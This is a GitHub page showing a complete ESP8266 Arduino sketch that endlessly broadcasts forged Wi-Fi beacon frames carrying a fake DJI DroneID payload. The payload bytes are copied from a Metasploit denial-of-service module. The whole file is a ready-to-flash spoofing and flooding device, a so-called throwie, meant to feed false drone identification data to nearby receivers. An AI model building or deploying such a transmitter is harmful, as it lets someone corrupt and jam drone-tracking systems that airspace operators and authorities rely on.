-
Notifications
You must be signed in to change notification settings - Fork 46
/
ESP8266_DJI_DroneID_Throwie.ino
61 lines (53 loc) · 3.16 KB
/
ESP8266_DJI_DroneID_Throwie.ino
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
// original code - https://gist.githubusercontent.com/kost/1e1b13d5796a6649f82ec1c08cd0a835/raw/81b0299a30c36e77f46e57eab8bcd03f77ceb39a/esp8266-wifi-beacon-generator.ino
// esp8266-wifi-beacon-generator by Kost - https://github.com/kost
#include <ESP8266WiFi.h>
extern "C" {
#include "user_interface.h"
}
// bytes derrived from: https://github.com/DJISDKUser/metasploit-framework/blob/62e36f1b5c6cae0abed9c86c769bd1656931061c/modules/auxiliary/dos/wifi/droneid.rb#L187
byte wifipkt[128] = {
0x80, // type/subtype
0x00, // flags
0x00, 0x00, // duration
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, // dst
0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // src
0x01, 0x02, 0x03, 0x04, 0x05, 0x06, // bssid
0x01, 0x02, // seq
0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, // timestamp value
0x64, 0x00, // beacon interval
0x00, 0x05, // capability flags
// ssid length and ssid
0x00, 0x0c, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46,
// supported rates
0x01, 0x08, 0x82, 0x84, 0x8b, 0x0c, 0x12, 0x96, 0x18, 0x24,
// current channel
0x03, 0x01, 0x0b,
// traffic indication map
0x05, 0x04, 0x00, 0x01, 0x00, 0x00,
// country information
0x07, 0x06, 0x55, 0x53, 0x00, 0x01, 0x0b, 0x1e,
// erp information
0x2a, 0x01, 0x00,
// extended supported rates
0x32, 0x04, 0x30, 0x48, 0x60, 0x6c,
// HT Capabilities
0x2d, 0x1a, 0xac, 0x01, 0x02, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
// HT Information
0x3d, 0x16, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
// RSN Information
0x30, 0x14, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x04, 0x01, 0x00, 0x00, 0x0f, 0xac, 0x02, 0x0c, 0x00,
// Vendor Specific: Microsoft WMM/WME Paramater Element
0xdd, 0x18, 0x00, 0x50, 0xf2, 0x02, 0x01, 0x01, 0x00, 0x00, 0x03, 0xa4, 0x00, 0x00, 0x27, 0xa4, 0x00, 0x00, 0x42, 0x43, 0x5e, 0x00, 0x62, 0x32, 0x2f, 0x00,
// fixedDroneID sample - https://github.com/DJISDKUser/metasploit-framework/blob/62e36f1b5c6cae0abed9c86c769bd1656931061c/modules/auxiliary/dos/wifi/droneid.rb#L93
0xdd, 0x52, 0x26, 0x37, 0x12, 0x58, 0x62, 0x13, 0x10, 0x01, 0x5a, 0x00, 0xd7, 0x0f, 0x44, 0x72, 0x6f, 0x6e, 0x65, 0x49, 0x44, 0x20, 0x69, 0x73, 0x20, 0x63, 0x72, 0x61, 0x70, 0x21, 0xb0, 0x78, 0x5b, 0x00, 0x29, 0xeb, 0xc2, 0xfe, 0xf6, 0x00, 0xd3, 0x00, 0xd8, 0x00, 0xab, 0x00, 0x3b, 0x00, 0xc0, 0x00, 0xf4, 0x00, 0x40, 0x00, 0x0c, 0x05, 0x3c, 0x00, 0x30, 0x79, 0x2f, 0x01, 0x10, 0x06, 0x31, 0x39, 0x35, 0x37, 0x34, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
void setup() {
delay(500);
wifi_set_opmode(STATION_MODE);
wifi_promiscuous_enable(1);
}
void loop() {
// http://espressif.com/sites/default/files/documentation/2c-esp8266_non_os_sdk_api_reference_en.pdf
wifi_send_pkt_freedom(wifipkt, 128, true);
delay(1);
}